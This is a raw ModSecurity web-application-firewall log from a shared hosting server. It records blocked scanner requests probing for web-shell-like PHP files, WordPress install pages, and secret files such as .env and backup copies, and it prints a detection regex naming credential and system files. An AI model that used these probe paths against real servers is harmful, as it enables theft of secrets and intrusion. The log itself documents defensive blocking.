[Tue May 26 19:53:19.156317 2026] [security2:error] [pid 86490:tid 86659] [client 74.249.173.207:4916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/aboute.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmFQAAAKw"]
[Tue May 26 19:53:19.156430 2026] [security2:error] [pid 86490:tid 86659] [client 74.249.173.207:4916] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/aboute.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmFQAAAKw"]
[Tue May 26 19:53:19.333620 2026] [security2:error] [pid 86490:tid 86707] [client 74.249.173.207:4161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmGwAAANw"]
[Tue May 26 19:53:19.333758 2026] [security2:error] [pid 86490:tid 86707] [client 74.249.173.207:4161] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmGwAAANw"]
[Tue May 26 19:53:19.483388 2026] [security2:error] [pid 86490:tid 86679] [client 74.249.173.207:4193] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/tx79.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmIwAAAMA"]
[Tue May 26 19:53:19.483539 2026] [security2:error] [pid 86490:tid 86679] [client 74.249.173.207:4193] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/tx79.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmIwAAAMA"]
[Tue May 26 19:53:19.557586 2026] [security2:error] [pid 86490:tid 86655] [client 66.249.66.161:53686] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmDQAAAKg"]
[Tue May 26 19:53:19.624562 2026] [security2:error] [pid 86490:tid 86691] [client 74.249.173.207:4178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-class.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmJQAAAMw"]
[Tue May 26 19:53:19.624694 2026] [security2:error] [pid 86490:tid 86691] [client 74.249.173.207:4178] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-class.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmJQAAAMw"]
[Tue May 26 19:53:19.794960 2026] [security2:error] [pid 86490:tid 86654] [client 74.249.173.207:4556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmKwAAAKc"]
[Tue May 26 19:53:19.795041 2026] [security2:error] [pid 86490:tid 86654] [client 74.249.173.207:4556] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/8.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmKwAAAKc"]
[Tue May 26 19:53:19.899043 2026] [security2:error] [pid 86490:tid 86714] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/:8443/.env"] [unique_id "ahWs11ZMwN0DpLVWo6KmMQAAAOM"]
[Tue May 26 19:53:19.937440 2026] [security2:error] [pid 86490:tid 86711] [client 74.249.173.207:4198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/options.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmOQAAAOA"]
[Tue May 26 19:53:19.937531 2026] [security2:error] [pid 86490:tid 86711] [client 74.249.173.207:4198] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/options.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmOQAAAOA"]
[Tue May 26 19:53:20.102834 2026] [security2:error] [pid 86490:tid 86680] [client 74.249.173.207:4922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/f5.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmRQAAAME"]
[Tue May 26 19:53:20.102933 2026] [security2:error] [pid 86490:tid 86680] [client 74.249.173.207:4922] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/f5.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmRQAAAME"]
[Tue May 26 19:53:20.319054 2026] [security2:error] [pid 86490:tid 86644] [client 74.249.173.207:4553] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/alpha.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmSgAAAJ0"]
[Tue May 26 19:53:20.319194 2026] [security2:error] [pid 86490:tid 86644] [client 74.249.173.207:4553] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/alpha.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmSgAAAJ0"]
[Tue May 26 19:53:20.360296 2026] [security2:error] [pid 86490:tid 86685] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs11ZMwN0DpLVWo6KmOAAAAMY"]
[Tue May 26 19:53:20.408233 2026] [security2:error] [pid 86490:tid 86727] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/connect.php.old"] [unique_id "ahWs2FZMwN0DpLVWo6KmTAAAAPA"]
[Tue May 26 19:53:20.538231 2026] [security2:error] [pid 86490:tid 86634] [client 54.205.63.235:61503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmTwAAAJM"]
[Tue May 26 19:53:20.578148 2026] [security2:error] [pid 86490:tid 86675] [client 74.249.173.207:4896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/son1.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmUwAAALw"]
[Tue May 26 19:53:20.578240 2026] [security2:error] [pid 86490:tid 86675] [client 74.249.173.207:4896] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/son1.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmUwAAALw"]
[Tue May 26 19:53:20.611266 2026] [security2:error] [pid 86490:tid 86639] [client 54.205.63.235:62198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmVQAAAJg"]
[Tue May 26 19:53:20.611394 2026] [security2:error] [pid 86490:tid 86679] [client 54.205.63.235:62197] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmVAAAAMA"]
[Tue May 26 19:53:20.611421 2026] [security2:error] [pid 86490:tid 86703] [client 54.205.63.235:62199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmVgAAANg"]
[Tue May 26 19:53:20.613697 2026] [security2:error] [pid 86490:tid 86512] [remote 39.46.99.190:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmSwAAxRU"]
[Tue May 26 19:53:20.618072 2026] [security2:error] [pid 86490:tid 86665] [client 54.205.63.235:62201] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmWAAAALI"]
[Tue May 26 19:53:20.618150 2026] [security2:error] [pid 86490:tid 86655] [client 54.205.63.235:62203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wp-admin/install.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmWgAAAKg"]
[Tue May 26 19:53:20.618191 2026] [security2:error] [pid 86490:tid 86657] [client 54.205.63.235:62202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmWQAAAKo"]
[Tue May 26 19:53:20.618213 2026] [security2:error] [pid 86490:tid 86747] [client 54.205.63.235:62204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmWwAAAQQ"]
[Tue May 26 19:53:20.618670 2026] [security2:error] [pid 86490:tid 86691] [client 54.205.63.235:62205] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmXQAAAMw"]
[Tue May 26 19:53:20.618900 2026] [security2:error] [pid 86490:tid 86716] [client 54.205.63.235:62206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmXAAAAOU"]
[Tue May 26 19:53:20.618946 2026] [security2:error] [pid 86490:tid 86662] [client 54.205.63.235:62209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmYAAAAK8"]
[Tue May 26 19:53:20.619078 2026] [security2:error] [pid 86490:tid 86673] [client 54.205.63.235:62210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmYQAAALo"]
[Tue May 26 19:53:20.619106 2026] [security2:error] [pid 86490:tid 86642] [client 54.205.63.235:62207] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmXwAAAJs"]
[Tue May 26 19:53:20.619394 2026] [security2:error] [pid 86490:tid 86712] [client 54.205.63.235:62208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmXgAAAOE"]
[Tue May 26 19:53:20.619430 2026] [security2:error] [pid 86490:tid 86740] [client 54.205.63.235:62200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmVwAAAP0"]
[Tue May 26 19:53:20.675374 2026] [security2:error] [pid 86490:tid 86704] [client 54.205.63.235:62231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmYgAAANk"]
[Tue May 26 19:53:20.697954 2026] [security2:error] [pid 86490:tid 86649] [client 74.249.173.207:4177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ggb.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmYwAAAKI"]
[Tue May 26 19:53:20.698130 2026] [security2:error] [pid 86490:tid 86649] [client 74.249.173.207:4177] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ggb.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmYwAAAKI"]
[Tue May 26 19:53:20.835510 2026] [security2:error] [pid 86490:tid 86677] [client 74.249.173.207:4901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ss.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmbAAAAL4"]
[Tue May 26 19:53:20.835601 2026] [security2:error] [pid 86490:tid 86677] [client 74.249.173.207:4901] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ss.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmbAAAAL4"]
[Tue May 26 19:53:20.917136 2026] [security2:error] [pid 86490:tid 86641] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/config/sample.bak"] [unique_id "ahWs2FZMwN0DpLVWo6KmbQAAAJo"]
[Tue May 26 19:53:20.981534 2026] [security2:error] [pid 86490:tid 86730] [client 74.249.173.207:4909] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/rh.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmdAAAAPM"]
[Tue May 26 19:53:20.981651 2026] [security2:error] [pid 86490:tid 86730] [client 74.249.173.207:4909] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/rh.php"] [unique_id "ahWs2FZMwN0DpLVWo6KmdAAAAPM"]
[Tue May 26 19:53:21.086020 2026] [security2:error] [pid 86490:tid 86666] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/modules/.env.old"] [unique_id "ahWs2VZMwN0DpLVWo6KmeAAAALM"]
[Tue May 26 19:53:21.192254 2026] [security2:error] [pid 86490:tid 86629] [client 74.249.173.207:4892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/99.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmeQAAAI4"]
[Tue May 26 19:53:21.192347 2026] [security2:error] [pid 86490:tid 86629] [client 74.249.173.207:4892] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/99.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmeQAAAI4"]
[Tue May 26 19:53:21.331181 2026] [security2:error] [pid 86490:tid 86728] [client 74.249.173.207:38949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/layout.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmfgAAAPE"]
[Tue May 26 19:53:21.331308 2026] [security2:error] [pid 86490:tid 86728] [client 74.249.173.207:38949] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/layout.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmfgAAAPE"]
[Tue May 26 19:53:21.566950 2026] [security2:error] [pid 86490:tid 86684] [client 74.249.173.207:4197] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/12.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmhgAAAMU"]
[Tue May 26 19:53:21.567057 2026] [security2:error] [pid 86490:tid 86684] [client 74.249.173.207:4197] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/12.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmhgAAAMU"]
[Tue May 26 19:53:21.595937 2026] [security2:error] [pid 86490:tid 86745] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/blog-app/frontend/.env"] [unique_id "ahWs2VZMwN0DpLVWo6KmhwAAAQI"]
[Tue May 26 19:53:21.710120 2026] [security2:error] [pid 86490:tid 86712] [client 74.249.173.207:4170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmjQAAAOE"]
[Tue May 26 19:53:21.710232 2026] [security2:error] [pid 86490:tid 86712] [client 74.249.173.207:4170] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahWs2VZMwN0DpLVWo6KmjQAAAOE"]
[Tue May 26 19:53:21.763657 2026] [security2:error] [pid 86490:tid 86690] [client 185.177.72.53:12280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/07-accessing-data/end/vue-heroes/.env"] [unique_id "ahWs2VZMwN0DpLVWo6KmkwAAAMs"]
